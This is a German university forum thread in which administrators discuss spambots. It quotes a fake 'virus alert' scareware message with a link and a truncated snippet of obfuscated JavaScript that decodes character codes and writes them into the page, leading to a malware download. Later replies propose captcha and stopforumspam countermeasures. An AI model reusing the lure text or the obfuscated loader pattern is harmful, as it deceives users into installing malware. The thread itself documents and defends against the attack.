Seiten: [1]
Drucken
Autor Thema: Spambots  (Gelesen 530 mal)
Jtb
Aktive Fachschaft
Dauerposter
*****
Geschlecht: Männlich
Beiträge: 1.980



WWW
« am: 07.02.2010, 14:19:21 »

Wir kämpfen leider gerade gegen ein paar Spambots im Forum.

Zum Beispiel der mittlerweile gebannte Benutzer ForenTeam, die folgende Mitteilungen verschickt hat:
Zitat
A virus alert was noticed on your computer.
We highly recommend you to check your computer and perform online virus check at our site immediately: http://security-tool2010.BLA/MrH
Gespeichert

mfg
Jens

.."Persönliche Daten sind wie Plutonium. Wenn zuviele davon auf einem Haufen liegen, wird es kritisch."

Chatte mit der Fachschaft: Jabber (oder direkt im Browser). Mein Status:
Jtb
Aktive Fachschaft
Dauerposter
*****
Geschlecht: Männlich
Beiträge: 1.980



WWW
« Antworten #1 am: 07.02.2010, 14:30:34 »

Ach ja, ich glaube man muss nicht weiter sagen, dass der Link einen Exploit enthält:

Code:
[....]
@(**40@(**41@(**59@(**125@(**32@(**41@(**40@(**41@(**59@(**13@(**10@(**60@(**47@(**115@(**99@(**114@(**105@(**112@(**116@(**62@(**";
        temp = xa670.split("@(**");
        for (var i in temp) {
                out += String.fromCharCode(temp[i]);
        }
        document.write(out);
})();

</script>

Im Endeffekt kommt aber nur ein Download einer Exe mit einem Packed.Win32.Krap.ai...
Gespeichert

mfg
Jens

.."Persönliche Daten sind wie Plutonium. Wenn zuviele davon auf einem Haufen liegen, wird es kritisch."

Chatte mit der Fachschaft: Jabber (oder direkt im Browser). Mein Status:
Kai S.
Megaposer
*****
Beiträge: 192


« Antworten #2 am: 07.02.2010, 14:53:22 »

Interessant; ich supporte ein BG, in dessen Forum war exakt der selbe spambot am werkeln ^^
Gespeichert
Jtb
Aktive Fachschaft
Dauerposter
*****
Geschlecht: Männlich
Beiträge: 1.980



WWW
« Antworten #3 am: 07.02.2010, 15:05:12 »

Ich hab jetzt erstmal bei den Benutzeraccounts aufgeräumt - ein paar Dutzend Spamaccounts gelöscht.

Ob und wie wir die Registrierung für Bots erschweren, sehen wir demnächst Wink
Gespeichert

mfg
Jens

.."Persönliche Daten sind wie Plutonium. Wenn zuviele davon auf einem Haufen liegen, wird es kritisch."

Chatte mit der Fachschaft: Jabber (oder direkt im Browser). Mein Status:
Arne
Hilft gerne
****
Geschlecht: Männlich
Beiträge: 85



WWW
« Antworten #4 am: 07.02.2010, 18:27:51 »

- Öfter wechselnden Captcha Text. Bei 20maligem neu anfordern des Bildes hab ich immer den selben Text, bloß geändertes Design. Der Text sollte auch wechseln bei Neuanforderung oder Reload der Seite. Text mit unterschiedlicher Farbe und Schriftart innerhalb eines Bildes, da es schon schon sehr gute Captcha-Cracker-Bots gibt.
- Double opt-in eMail verification (evt. schon vorhanden?)
« Letzte Änderung: 08.02.2010, 02:28:47 von Arne » Gespeichert

*greeez*
Arne
thyrox
Aktive Fachschaft
Weiß viel
***
Geschlecht: Männlich
Beiträge: 63


4. Semester Zug A


WWW
« Antworten #5 am: 07.02.2010, 18:51:14 »

kann man vielleicht recaptcha einbinden?

http://recaptcha.net/

so long,

thyrox
Gespeichert

Chatte mit der Fachschaft: Jabber (oder direkt im Browser). Mein Status

Bei jeglichen Fragen lohnt sich ein Blick in das Wiki.
Andere interessante Bereiche:
Klausurausleihe (nur mit Studaccount möglich)
Druckerquota (Studaccount) oder Druckerquota (Userv-Account)
k0re
Aktive Fachschaft
gibts jemanden der mehr sagt?
*****
Geschlecht: Männlich
Beiträge: 141


U Menekse


WWW
« Antworten #6 am: 08.02.2010, 00:14:26 »

kann man vielleicht recaptcha einbinden?

http://recaptcha.net/

so long,

thyrox

http://custom.simplemachines.org/mods/index.php?mod=1044

gibt es...
Gespeichert

3. Semester B.Sc. FB Informatik | Bei fragen einfach ne Nachricht oder im Jabber der Fachschaft | Jabber Status:
voellger
Fachschaftsrat
Nicht mehr zu helfen
*****
Geschlecht: Männlich
Beiträge: 568



« Antworten #7 am: 08.02.2010, 00:33:24 »

jaja, ich brauch nur n bissl zeit, dann wirds gemacht Smiley
Gespeichert

Chatte mit der Fachschaft: Jabber (oder direkt im Browser). Mein Status
|| Fachschaftsrat || Evaluationskommission || QV-Mittel Kommission ||
Jtb
Aktive Fachschaft
Dauerposter
*****
Geschlecht: Männlich
Beiträge: 1.980



WWW
« Antworten #8 am: 08.02.2010, 10:19:11 »

Als erste Gegenmaßnahme gibt es jetzt eine Überprüfung von neuen Logins gegen die Datenbank von www.stopforumspam.com
Gespeichert

mfg
Jens

.."Persönliche Daten sind wie Plutonium. Wenn zuviele davon auf einem Haufen liegen, wird es kritisch."

Chatte mit der Fachschaft: Jabber (oder direkt im Browser). Mein Status:
Seiten: [1]
Drucken
Gehe zu: